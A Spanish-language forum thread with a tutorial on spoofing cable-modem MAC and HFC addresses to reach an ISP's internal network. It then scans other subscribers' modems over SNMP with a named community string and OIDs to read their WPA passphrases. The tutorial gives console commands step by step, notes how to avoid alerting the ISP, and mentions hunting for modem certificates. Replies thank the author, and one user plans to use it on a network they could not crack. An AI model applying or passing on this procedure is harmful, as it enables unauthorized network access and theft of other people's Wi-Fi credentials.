Página 1 de 1

Sacar pass WPA-PSK wifi con snmp By Duna

Publicado: 23 Ago 2010, 04:07
por depuniet
Pass WPA-PSK con snmp.
Aparte de alguna wifi proxima esto nos puede ser util si buscais certs con el portatil y as dado con algun cm con autentificacion WPA.

Solo para nuestro ISP de Cable ya ke vamos a usar scan snmp de red interna.

En oño ke yo sepa solo funcciona en zona exauña

Seguir uno de estos dos hilos segun modelo de cm ke tengais, para poder acceder a subred:

Scan snmp, etc open subnet

Código: Seleccionar todo

Me dio por mirar otra vez el tema de scan snmp y como se ke no funciona por tener el configfile agentes con filtros de IPs y nosotros al enviar cualkier pakete fuera de nuestro pc usa la ip publica.
Pues pense en ke esa IP publica de salida fuera la ip hfc de tipo A y sabiendo ke en el configfile hay un agent snmp con read only con cualkier ip 10.xx.xx.xx.

Para este metodo se rekiere de un cm RG (residencial gateway) tipo 2300, sbg900, etc con firm original y en modo RG ke es como esta de origen si no lo cambiaron.
Ya mirare haber si puede ser tambien en CM no RG

Esta testeado en un 2320.
Tenemos ke acceder a consola serial o telnet
No voy a explicar como activar telnet o cambiar la mac para eso ya hay post ke lo explican.


Necesitamos una mac operativa sea la ke sea, no lo probe pero tambien a de funcionar con macs de baja.

Ahora vamos a consola y hacemos estos pasos:

cd /
cd n
cd d
ip_stack_number 3
write
cd ..
cd h
mac_address 3 00:11:22:33:44:55
write
cd /
reset

Donde 00:11:22:33:44:55 es la mac operativa a poner

Con esto conseguimos tener una IP de salida del rago 10.xx.xx.xx con lo ke estaremos conectados a toda la red de nuestro isp.
Pudiendo conectar por snmp, tftp, etc a otras ip de la red interna.

Recomiendo el programa fastsnmp ya ke da mucha info incluso si es docsis 1.0 o 1.1 (no comprobe si es corecto)
No uses scans de mucho rango de ip ya ke esto puede alertar al isp, Usar con moderacion pls.
Se puede scanear otros nodos distintos al vuestro

Community por ISPs:
OÑO= r3m0t3 (lectura solo)
Otras isp aportar users

PD: lastima ke llega tarde este metodo ya ke son pocas las macs 1.0. buscare haber si se puede extraer certificados
Scan snmp, etc open subnet metodo2

Código: Seleccionar todo

Este metodo sirve para cm cablemodem no cm RG como era el anterior metodo.
La idea es la misma es suplantar la mac y ip del hfc

Testeado en.
moto SB5100 SB5100MoD.1.0.4.Beta
Mac docsis 1.0 operativa

En teoria tiene ke funcionar con otros firm y macs 1.1
Excepto con haxor lite ke tiene una consola minimal.
Cita:
Actualizo para haxor lite o cualkier cm

Código: Seleccionar todo

Los paso ke explico son para consola serial, pero lo podeis hacer en consola telnet con alguna diferencia.

Lo primero ke tenemos ke tener es el cm operativo se puede hacer ya estando operativo o reiniciando el cm.

Habilitar y deshabilitar adaptador de red :

Panel de control/sistema/harware/administrado de dispositivos/adaptador
Boton derecho del raton para:
-habilitar
-deshabilitar
-Propiedades (para cambiar la mac)

Pasos a seguir por orden: metodo liberando hfc ipstack1 

1- Tener el adptador de red deshabilitado ya ke no lo necesitamos en consola serial

2- Reiniciar el cm si no esta operativo, si ya esta operativo no hace falta reiniciar

3- Anotar la ip, mascara de red, gateway y mac del ipstack1 hfc 
En consola:
cd /
cd ip
lease_show 1
y

4- en consola:
cd /
cd ip
ipconfig 1 release
y

5- EN consola:

cd /
cd cm
cpe_max 12
cpe_print
cpe_del x
cpe_print (para comprobar ke se elimino)


Donde X es el numero del cpe del ipstack1 ke vemos en "cpe_print"


6-En consola:

cd /
cd fo
lt_show
lt_delete X
lt_show (para comprobar ke se elimino)
Donde X es el numero del ipstack1


7- El adaptador de red sigue deshabilitado.
Ahora vamos a "Conexiones de red" en propiedades y configuramos el tcp/ip en dhcp (auto) o manual.
En manual ponemos :
direccion de ip= la ip ke apuntamos del iptack1 hfc
mask = la mask poner la ke tenia el ipstack 1 o 255.0.0.0
Gateway= la del ipstack1 (suele ser la ip del nodo)

8- Ahora vamos a propiedades del adaptador y le cambiamos la mac por la mac ke anotamos del ipstack1 hfc y aceptamos.
Ya solo keda habilitar el adaptador de red y listo

9- comprobais como ya tenes la ip del hfc
cmd/ipconfig /all
Ping a la ip de vuestro nodo

FIN
<<<<<<<<<<<<<<<<<<

Para haxor lite o cualkier cm metodo sin liberar ipstack1

1- Deshabilitar adaptador de red y cambiar la mac por la del ipstack1 hfc, volver a habilitar

2- Ahora en consola vereis el log de hijack de mac ni caso y hacemos lo siguiente

cd /
cd fo
lt_show
lt_delete X
lt_show (para comprobar ke se elimino)
Donde X es el numero del ipstack1

Ya os tiene ke funcionar y parar mensaje de hijack

En telnet es lo mismo pero con ips en tcp/ip tener en manual
192.168.100.10
255.255.255.0
192.168.100.1

Fin
<<<<<<<<<<<<<<
Anexo para hacerlo con telnet
Para telnet son los mismos camandos solo cambia lo de adaptador de red.

Solo pongo los pasos ke cambian:

1 - hay ke tener adaptador habilitado con la mac ke uses habitualmente
Tener el tcp/ip en manual
192.168.100.10
255.255.255.0
192.168.100.1

7- Ahora ke ya terminamos con todos los comandos.
Deshabilitamos el adaptador.
Una vez deshabilitado vamos a "Conexiones de red" en propiedades y configuramos el tcp/ip en dhcp (auto) o manual.
En manual ponemos :
direccion de ip= la ip ke apuntamos del iptack1 hfc
mask = la mask poner la ke tenia el ipstack 1 o 255.0.0.0
Gateway= la del ipstack1 (suele ser la ip del nodo)

Código: Seleccionar todo

Para volver a tener acceso a internet osea tener ip publica solo tenemos ke poner la mac ke teniamos antes el el adaptador de red deshabilitar y habilitar

Notas:Con este metodo podemos aceder a red interna para poder scanear snmp, arp, acceder a servers tftp, etc

Si cuando Habilitamos el adaptador de red al final y en consola nos muestra un mensaje de hijack de la mac ipstack1 es ke algun paso no lo hiciste correcto.
Una vez tengamos listo el cm:
1- Tener el ESSID (nombre AP) y BSSID (mac AP, opcional solo si el ESSID es el default)

2- Saber el subnodo dnd esta el AP y su mascara de subred, para limitar el rango de scaneo

3- ejecutar "snmpcfg admin 1.8"
-Borrar todas las OIDs ke tenga para solo dejar las ke necesitamos.
-Poner el rango solo del subnodo dnd esta el AP.
-Poner a 300ms el tiempo de espera. si despues del scan no mostro el ESSID ke buscas subir a 500ms.
Yo la wifi ke buscaba hasta ke no puse 300ms no me la mostro.

OIDs a usar:

En la lista del oids del snmpcfg tiene ke estar la primera la oid de la pass WPA y despues la del ESSID del AP. De esta manera solo nos muestra cm con seguridad WPA.

OID PassPhrase WPA:
1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.3 (webstar 2320, thomson 710)
1.3.6.1.4.1.4491.2.4.1.1.6.2.2.1.5.32 (thomson 850)
OID ESSID:
1.3.6.1.4.1.4413.2.2.2.1.5.1.2.0

Ejemplo para un AP WebStar 2320 y thomson 710

Imagen


Si el AP ke buscais tiene el ESSID defalt como WebStar, THOMSON, os mostrara varios resultados.
Para saber cual es el ke buscais teneis ke hecer getnext a las IPs HFC ke os muestra de cada cm con onestep o otro cliente snmp.
OID BSSID (mac AP):
getnext 1.2.840.10036.2.1.1.1
Suelen ser estas:
1.2.840.10036.2.1.1.1.6 (comun)
1.2.840.10036.2.1.1.1.3
1.2.840.10036.2.1.1.1.5
1.2.840.10036.2.1.1.1.32 (solo thomson 850)

Este metodo es desde tu casa con tu cm online.
Le sacas el pass a una wifi ke este a tu alcance y tiene ke se de tu mismo ISP de cable.
Lo de portatil es si vas de pesca de certs y encuentras un AP con WPA te apuntas el nombre y la mac del AP y desde tu casa lo sacas.

Esto no es para AP de ISP de ADSL timofonica, jazztel. etc

No se si se entendio

Gracias duna

Re: Sacar pass WPA-PSK wifi con snmp By Duna

Publicado: 04 Sep 2010, 02:36
por tripx
Buena info, pero necesito checarlo mas despacio..... Parece que seremos todos unos Haxors jejejje!!!

Ese bro es todo un cracker para la seguridad de modems y wireless

Saludos!!!

Re: Sacar pass WPA-PSK wifi con snmp By Duna

Publicado: 03 Dic 2010, 03:10
por alber535
buen tuto amigo sigue asi

Re: Sacar pass WPA-PSK wifi con snmp By Duna

Publicado: 03 Dic 2010, 13:09
por -?-
mmm esto funciona asta cierto grado siempre que uno quiera sacar estas contraseñas debe autentificarse los que lo an logrado por medio de fuerza bruta saben eso el psk es mas simple de lo que muchos piensan mas una wpa normal

Re: Sacar pass WPA-PSK wifi con snmp By Duna

Publicado: 05 Dic 2010, 12:56
por kuk2
Muy bien explicado, muchas gracias

Re: Sacar pass WPA-PSK wifi con snmp By Duna

Publicado: 09 Abr 2012, 19:36
por R3SH0K
Gracias por compartir tus conocimientos y por explicarlo tan D.P.M.
Ahora mismo me pondre con eso pues estoy hasta las 00 de probar diccionarios jajaja lleva mi pc probando diccionarios desde principios d enero24/24. y es una santa animalada. a ver si con este metodo consigo sacar la maldita WPA-PSK XDDD
GRACIAS.tardare en comentar pues no tengo ahora internet en casa y no puedo conectarme todos los dias :(

salu2

Re: Sacar pass WPA-PSK wifi con snmp By Duna

Publicado: 09 Mar 2013, 19:11
por valium7
Ya vi el tutorial y es de suponer que no funciona